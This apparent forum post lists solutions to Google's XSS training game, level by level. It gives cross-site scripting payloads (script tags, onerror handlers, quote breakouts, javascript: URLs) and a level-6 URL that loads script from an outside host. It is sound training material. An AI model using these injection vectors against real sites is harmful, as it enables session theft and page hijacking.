x32x01
ADMINISTRATOR
- by x32x01 ||
Below are the solutions to Google XSS challenges hosted on https://xss-game.appspot.com
########## Level 1: Hello, world of XSS ##########
*** Query ***
*** Vector ***
########## Level 2: Persistence is key ##########
*** Vector ***
########## Level 3: That sinking feeling... ##########
*** Query ***
*** Vector ***
########## Level 4: Context matters ##########
*** Query ***
*** Vector ***
########## Level 5: Breaking protocol ##########
*** Query ***
*** Vector ***
########## Follow the White Rabbit ##########
*** Query ***
*** Vector ***
########## Level 1: Hello, world of XSS ##########
*** Query ***
Code:
https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script>
Code:
<script>alert(1)</script>
########## Level 2: Persistence is key ##########
*** Vector ***
Code:
"><img src=x onerror=alert(1)>
########## Level 3: That sinking feeling... ##########
*** Query ***
Code:
https://xss-game.appspot.com/level3/frame#'/><script>alert(1)</script>
Code:
'/><script>alert(1)</script>
########## Level 4: Context matters ##########
*** Query ***
Code:
https://xss-game.appspot.com/level4/frame?timer=1');alert('1
Code:
1')%3Balert('1
########## Level 5: Breaking protocol ##########
*** Query ***
Code:
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)
Code:
javascript:alert(1)
########## Follow the White Rabbit ##########
*** Query ***
Code:
https://xss-game.appspot.com/level6/frame#HTTPS://dj-infosec.divshot.io/content.js
Code:
HTTPS://dj-infosec.divshot.io/content.js